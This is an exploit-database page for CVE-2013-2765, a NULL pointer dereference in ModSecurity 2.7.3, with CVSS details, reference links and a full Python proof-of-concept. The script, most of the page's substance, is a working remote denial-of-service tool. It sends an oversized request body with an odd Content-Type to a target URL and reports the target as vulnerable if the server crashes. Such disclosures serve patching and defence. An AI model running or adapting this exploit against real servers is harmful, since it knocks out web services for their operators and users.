ModSecurity 2.7.3 NULL pointer dereference PoC

2013-06-01 / 2013-07-15
Credit: Younes JAAIDI
Risk: High
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

#!/usr/bin/env python3 #-*- coding: utf-8 -*- # # Created on Mar 29, 2013 # # @author: Younes JAAIDI <yjaaidi@shookalabs.com> # import argparse import http.client import logging import sys import urllib.request logger = logging.getLogger(__name__) logger.setLevel(logging.DEBUG) logger.addHandler(logging.StreamHandler(sys.stderr)) class ModSecurityDOSCheck(object): _DEFAULT_REQUEST_BODY_SIZE = 200 # KB _DEFAULT_CONCURRENCY = 100 _DEFAULT_USER_AGENT = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36" def __init__(self): self._request_counter = 0 self._status_message = None def main(self, args_list): args_object = self._parse_args(args_list) payload = "A" * args_object.request_body_size * 1024 request = urllib.request.Request(args_object.target_url, method = "GET", data = payload.encode('utf-8'), headers = {'Content-Type': 'text/random', 'User-Agent': self._DEFAULT_USER_AGENT}) if self._send_request(request): logger.info("Target seems to be vulnerable!!!") return 0 else: logger.info("Attack didn't work. Try increasing the 'REQUEST_BODY_SIZE'.") return 1 def _parse_args(self, args_list): parser = argparse.ArgumentParser(description="ModSecurity DOS tool.") parser.add_argument('-t', '--target-url', dest = 'target_url', required = True, help = "Target URL") parser.add_argument('-s', '--request-body-size', dest = 'request_body_size', default = self._DEFAULT_REQUEST_BODY_SIZE, type = int, help = "Request body size in KB") return parser.parse_args() def _send_request(self, request): try: urllib.request.urlopen(request) return False except (http.client.BadStatusLine, urllib.error.HTTPError): return True if __name__ == '__main__': sys.exit(ModSecurityDOSCheck().main(sys.argv))

References:

https://cxsecurity.com/issue/WLB-2013050196
http://sourceforge.net/mailarchive/message.php?msg_id=30900019
https://raw.github.com/SpiderLabs/ModSecurity/master/CHANGES
https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-2765
ttps://github.com/SpiderLabs/ModSecurity/commit/0840b13612a0b7ef1ce7441cf811dcfc6b463fba


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top